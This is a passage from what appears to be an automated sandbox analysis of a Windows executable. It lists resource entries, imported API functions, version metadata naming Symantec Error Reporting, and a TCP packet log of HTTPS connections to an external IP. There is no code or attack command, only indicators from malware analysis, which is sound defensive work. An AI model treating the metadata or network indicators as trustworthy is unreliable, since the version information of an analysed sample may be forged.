RT_ICON | 0x120a08 | 0x988 | data | English | United States
RT_ICON | 0x121390 | 0x6b8 | data | English | United States
RT_ICON | 0x121a48 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x121eb0 | 0x668 | data | English | United States
RT_ICON | 0x122518 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0x122800 | 0x1e8 | data | English | United States
                          RT_ICON0x1229e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x122b100xea8dataEnglishUnited States
                          RT_ICON0x1239b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x1242600x6c8dataEnglishUnited States
                          RT_ICON0x1249280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x124e900x25a8dataEnglishUnited States
                          RT_ICON0x1274380x10a8dataEnglishUnited States
                          RT_ICON0x1284e00x988dataEnglishUnited States
                          RT_ICON0x128e680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1292d00x668dataEnglishUnited States
                          RT_ICON0x1299380x2e8dataEnglishUnited States
                          RT_ICON0x129c200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x129d480xea8dataEnglishUnited States
                          RT_ICON0x12abf00x8a8dataEnglishUnited States
                          RT_ICON0x12b4980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x12ba000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x12ff300x25a8dataEnglishUnited States
                          RT_ICON0x1324d80x10a8dataEnglishUnited States
                          RT_ICON0x1335800x988dataEnglishUnited States
                          RT_ICON0x133f080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1343700x668dataEnglishUnited States
                          RT_ICON0x1349d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x134cc00x1e8dataEnglishUnited States
                          RT_ICON0x134ea80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x134fd00xea8dataEnglishUnited States
                          RT_ICON0x135e780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x1367200x6c8dataEnglishUnited States
                          RT_ICON0x136de80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1373500x25a8dataEnglishUnited States
                          RT_ICON0x1398f80x10a8dataEnglishUnited States
                          RT_ICON0x13a9a00x988dataEnglishUnited States
                          RT_ICON0x13b3280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x13b7900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x14dbb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x1527e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x156a080x25a8dataEnglishUnited States
                          RT_ICON0x158fb00x10a8dataEnglishUnited States
                          RT_ICON0x15a0580xeb0dataEnglishUnited States
                          RT_ICON0x15af080x988dataEnglishUnited States
                          RT_ICON0x15b8900x6b8dataEnglishUnited States
                          RT_ICON0x15bf480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15c3b00x668dataEnglishUnited States
                          RT_ICON0x15ca180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x15cd000x1e8dataEnglishUnited States
                          RT_ICON0x15cee80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15d0100xea8dataEnglishUnited States
                          RT_ICON0x15deb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x15e7600x6c8dataEnglishUnited States
                          RT_ICON0x15ee280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15f3900x25a8dataEnglishUnited States
                          RT_ICON0x1619380x10a8dataEnglishUnited States
                          RT_ICON0x1629e00x988dataEnglishUnited States
                          RT_ICON0x1633680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1637d00x668dataEnglishUnited States
                          RT_ICON0x163e380x2e8dataEnglishUnited States
                          RT_ICON0x1641200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1642480xea8dataEnglishUnited States
                          RT_ICON0x1650f00x8a8dataEnglishUnited States
                          RT_ICON0x1659980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x165f000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x16a4300x25a8dataEnglishUnited States
                          RT_ICON0x16c9d80x10a8dataEnglishUnited States
                          RT_ICON0x16da800x988dataEnglishUnited States
                          RT_ICON0x16e4080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x16e8700x668dataEnglishUnited States
                          RT_ICON0x16eed80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x16f1c00x1e8dataEnglishUnited States
                          RT_ICON0x16f3a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x16f4d00xea8dataEnglishUnited States
                          RT_ICON0x1703780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x170c200x6c8dataEnglishUnited States
                          RT_ICON0x1712e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1718500x25a8dataEnglishUnited States
                          RT_ICON0x173df80x10a8dataEnglishUnited States
                          RT_ICON0x174ea00x988dataEnglishUnited States
                          RT_ICON0x1758280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x175c900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x1880b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x18cce00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x190f080x25a8dataEnglishUnited States
                          RT_ICON0x1934b00x10a8dataEnglishUnited States
                          RT_ICON0x1945580xeb0dataEnglishUnited States
                          RT_ICON0x1954080x988dataEnglishUnited States
                          RT_ICON0x195d900x6b8dataEnglishUnited States
                          RT_ICON0x1964480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1968b00x668dataEnglishUnited States
                          RT_ICON0x196f180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x1972000x1e8dataEnglishUnited States
                          RT_ICON0x1973e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1975100xea8dataEnglishUnited States
                          RT_ICON0x1983b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x198c600x6c8dataEnglishUnited States
                          RT_ICON0x1993280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1998900x25a8dataEnglishUnited States
                          RT_ICON0x19be380x10a8dataEnglishUnited States
                          RT_ICON0x19cee00x988dataEnglishUnited States
                          RT_ICON0x19d8680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x19dcd00x668dataEnglishUnited States
                          RT_ICON0x19e3380x2e8dataEnglishUnited States
                          RT_ICON0x19e6200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x19e7480xea8dataEnglishUnited States
                          RT_ICON0x19f5f00x8a8dataEnglishUnited States
                          RT_ICON0x19fe980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1a04000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x1a49300x25a8dataEnglishUnited States
                          RT_ICON0x1a6ed80x10a8dataEnglishUnited States
                          RT_ICON0x1a7f800x988dataEnglishUnited States
                          RT_ICON0x1a89080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_GROUP_ICON0x1a8d700xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a8e200x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a8ea40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a8f540xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a8ff40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a90a40x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a91280xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a91d80xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a92780xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a93280x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a93ac0xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a945c0xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a94fc0xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a95ac0x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a96300xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a96e00xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a97800xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a98300x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a98b40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a99640xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a9a040xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a9ab40x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a9b380xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a9be80xa0dataEnglishUnited States
                          RT_VERSION0x1a9c880x340dataEnglishUnited States
                          RT_VERSION0x1a9fc80x2f8dataEnglishUnited States
                          RT_VERSION0x1aa2c00x344dataEnglishUnited States
                          RT_VERSION0x1aa6040x318dataEnglishUnited States
                          RT_VERSION0x1aa91c0x340dataEnglishUnited States
                          RT_VERSION0x1aac5c0x2f8dataEnglishUnited States
                          RT_VERSION0x1aaf540x344dataEnglishUnited States
                          RT_VERSION0x1ab2980x318dataEnglishUnited States
                          RT_VERSION0x1ab5b00x340dataEnglishUnited States
                          RT_VERSION0x1ab8f00x2f8dataEnglishUnited States
                          RT_VERSION0x1abbe80x344dataEnglishUnited States
                          RT_VERSION0x1abf2c0x318dataEnglishUnited States
                          RT_VERSION0x1ac2440x340dataEnglishUnited States
                          RT_VERSION0x1ac5840x2f8dataEnglishUnited States
                          RT_VERSION0x1ac87c0x344dataEnglishUnited States
                          RT_VERSION0x1acbc00x318dataEnglishUnited States
                          RT_VERSION0x1aced80x340dataEnglishUnited States
                          RT_VERSION0x1ad2180x2f8dataEnglishUnited States
                          RT_VERSION0x1ad5100x344dataEnglishUnited States
                          RT_VERSION0x1ad8540x318dataEnglishUnited States
                          RT_VERSION0x1adb6c0x340dataEnglishUnited States
                          RT_VERSION0x1adeac0x2f8dataEnglishUnited States
                          RT_VERSION0x1ae1a40x344dataEnglishUnited States
                          RT_VERSION0x1ae4e80x318dataEnglishUnited States
                          RT_MANIFEST0x1ae8000x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1aef800x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1af1c80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1af5940x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1afd7c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b04fc0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b07440x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                          Imports

                          DLL | Import
                          advapi32.dll | RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                          comctl32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                          gdi32.dll | GetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                          kernel32.dll | GetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                          ole32.dll | CoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                          shell32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
                          user32.dll | IsWindowVisible, DispatchMessageA, SendMessageTimeoutA, CreateWindowExA, GetClientRect, SetWindowPos, SystemParametersInfoA, LoadBitmapA, CharPrevA, EndPaint, DestroyWindow, EnableMenuItem, AppendMenuA, ShowWindow, SetWindowLongA, InvalidateRect, EnableWindow, OpenClipboard, EmptyClipboard, GetMessagePos, SendMessageA, ExitWindowsEx, IsWindowEnabled, BeginPaint, GetSysColor, PostQuitMessage, GetSystemMetrics, MessageBoxIndirectA, SetDlgItemTextA, EndDialog, SetClassLongA, GetDC, DefWindowProcA, CloseClipboard, GetDlgItemTextA, SetForegroundWindow, FillRect, LoadCursorA, CharNextA, IsWindow, GetSystemMenu, CreateDialogParamA, GetWindowRect, RegisterClassA, GetWindowLongA, DrawTextA, FindWindowExA, CheckDlgButton, TrackPopupMenu, wsprintfA, DialogBoxParamA, CreatePopupMenu, SetCursor, SetWindowTextA, ScreenToClient, LoadImageA, SetClipboardData

                          Exports

                          Name | Ordinal | Address
                          DllRegisterServer | 1 | 0x1002513f

                          Version Infos

                          Description | Data
                          LegalCopyright | Copyright 2016 Symantec Corporation. All rights reserved.
                          InternalName | SymErr
                          FileVersion | 7.6.2.5
                          CompanyName | Symantec Corporation
                          ProductName | Symantec Shared Component
                          ProductVersion | 7.6
                          FileDescription | Symantec Error Reporting
                          OriginalFilename | SymErr.exe
                          Translation | 0x0409 0x04b0

                          Possible Origin

                          Language of compilation system | Country where language is spoken
                          English | United States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          Dec 14, 2021 10:34:07.185971975 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.186019897 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187247038 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187302113 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187354088 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187377930 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.187450886 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.187468052 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.209757090 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.209801912 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.210836887 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216116905 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.216147900 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216173887 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.216298103 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.224546909 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.224595070 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.224706888 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.226381063 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.226412058 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232654095 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232695103 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232803106 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.232842922 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.232862949 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.233596087 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233634949 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233700037 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.233722925 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.233741999 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.234407902 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234446049 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234505892 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.234528065 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.234549999 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235137939 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235188007 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235208035 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235224009 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235290051 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235382080 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235419989 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235455036 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235476971 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235500097 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235699892 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235740900 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235780954 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.235800982 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.235822916 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.236316919 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236355066 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236418009 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.236442089 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.236459017 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.240600109 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257313013 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257358074 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257421017 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257437944 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257467985 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.257617950 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.257905006 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258781910 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258809090 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.258944035 CET49795443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.258956909 CET4434979579.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.264395952 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.264424086 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.264484882 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.265105963 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.265121937 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.304610014 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.304718018 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.306762934 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.306777954 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.307193995 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.310327053 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.344216108 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.344341040 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.346394062 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.346417904 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.346971035 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.348973989 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.352890968 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391892910 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391928911 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.391961098 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.392038107 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392082930 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.392102003 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392159939 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.392874002 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393558025 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393594980 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393692970 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.393716097 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.393732071 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.393990040 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416309118 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416358948 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416429043 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416465044 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.416487932 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.416950941 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417088985 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417133093 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417177916 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417191982 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417244911 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417253971 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417695045 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417742968 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417818069 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.417831898 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.417850971 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.419253111 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.437350988 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437383890 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437407970 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437532902 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.437561989 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.437732935 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.438250065 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438281059 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438347101 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.438364983 CET4434979779.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.438376904 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.439080000 CET49797443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440407991 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440448046 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440541983 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440578938 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.440612078 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.440958023 CET49796443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:07.441293001 CET4434979679.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:07.441338062 CET4434979679.110.52.144192.168.2.5
